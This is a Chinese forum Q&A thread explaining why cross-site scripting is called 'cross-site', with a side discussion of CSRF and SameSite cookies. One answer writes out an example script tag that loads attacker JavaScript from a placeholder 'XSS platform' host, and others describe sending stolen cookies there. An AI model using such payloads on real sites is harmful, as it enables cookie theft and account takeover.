xss跨站脚本攻击,跨站二字在哪里体现?
我理解的跨站,这个站应该是指一个传播的媒介,像论坛,社交网络等。和跨站请求伪造的跨站是一样的意思。而跨站又分为恶意网站内跨站和恶意网站外跨站。而作者写的例子是一个网站内的跨站,访问时也是可以直接触发,但是威力和范围远小于网站外跨站。
■网友
大多数情况
A站访客受到的XSS攻击代码是来自于B站
通过攻击得到的数据反馈会传至B站
【xss跨站脚本攻击,跨站二字在哪里体现?】 故称跨站
■网友
把所获取到的cookie发送给xss平台
■网友
用一下xss平台就知道了,通常是不是\u0026lt;srcipt src=http://xxx.xxx.com/xxx.js\u0026gt;\u0026lt;/script\u0026gt;这样的,很明显啊,你要把平台生成的js链接插到有xss问题的地方,不管是存储的还是反射的,用户或者管理员在受害站点触发了,是不是就执行了你xss平台上的代码?你的xss平台和受害站点是不是两个站?很明显的道理嘛,至于beef之类联合msf那就是进步一点的玩法了
■网友
个人理解:
跨站脚本攻击Cross Site Scripting
跨站脚本的攻击:网站有漏洞,可以被人注入js代码执行,则攻击者一般会注入一段脚本(通过内联或外联),该脚本是不属于该网站的,所以叫跨站脚本攻击
跨站请求伪造Cross Site Request Forgery
通过第三方网站,进行某个网站的请求伪造:如淘宝的服务端收到一个http请求,如果该请求带有会话状态的cookie,则会认为是某个淘宝用户(服务端假设未做CSRF防范),而浏览器的任意网站是可以通过Post的表单向淘宝发起请求的,这种请求便属于伪造淘宝网站的请求,浏览器这边如果给这个伪造的请求带上淘宝网站的cookie则会导致CSRF的产生
CSRF的跨站,应该是指跨域网站吧,因为cookie中跨站是指在http://a.taobao.com发起http://taobao.com的请求,三级域名的网站与二级域名的网站属于不同站点,但是根域名与二级域名都相等,
而CSRF一般是第三方域名网站进行攻击的,如http://heike.org是黑客的网站,网站中会自动发起向淘宝的POST请求进行攻击
罪魁祸首应该是第三方网站中请求某个网站请求,浏览器带上了某个网站的cookie,所以现在的浏览器给cookie设置了一个SameSite字段,来表示某个网站设置的cookie,是否可以在别的网站中请求该网站时携带
原先SameSite的默认值时None,即允许第三方网站的某网站请求某网站的cookie,最近Chrome新版本基于安全考虑,将其设置为lax,即在一定条件(尽可能保证安全,减少CSRF产生的成功)下允许携带
有错误之处欢迎指正
■网友
传cookie给其他接受平台啊!这不就是这两个字的解释吗!
■网友
用户乙访问网站A,cookie被恶意代码获取,
然后该代码把cookie传到了用户甲的网站B数据库里,
这不就从跨了嘛~
如果只获取cookie,不保存到另一个数据库上,
那不是太有意义,得保存到网站A的本地数据库,
那就需要有网站A的数据库权限,
都这么大权限了,还搞啥跨站,干下web权限直接挂马呀
推荐阅读
- 游戏公司一般咋识别游戏脚本
- 为啥防范xss要过滤发帖内容,照单全收后显示时直接放到\u003ciframe sandbox security=restrict\u003e中不就行了
- php环境下xss成功alert,是否就意味着可以利用platform拿下cookie?
- 自动化脚本和多几个人一起点是等效的吗
- 为啥大多数人反对“女性穿得少被人侵犯都是活该”,却强调“数据库必须做防注入和防XSS攻击”
- 游戏是怎样反外挂自检的外挂脚本修改了PE结构之后还会被检测到吗
- FAQ-交互脚本的最佳格式
- perl中怎样调用另一个脚本
- 写一个炉石传说的脚本,怎样设计算法才能保证尽可能高的胜率或者说需要考虑哪些因素
- 我想执行一个脚本,然后知道10多台服务器在不在线,这个脚本咋写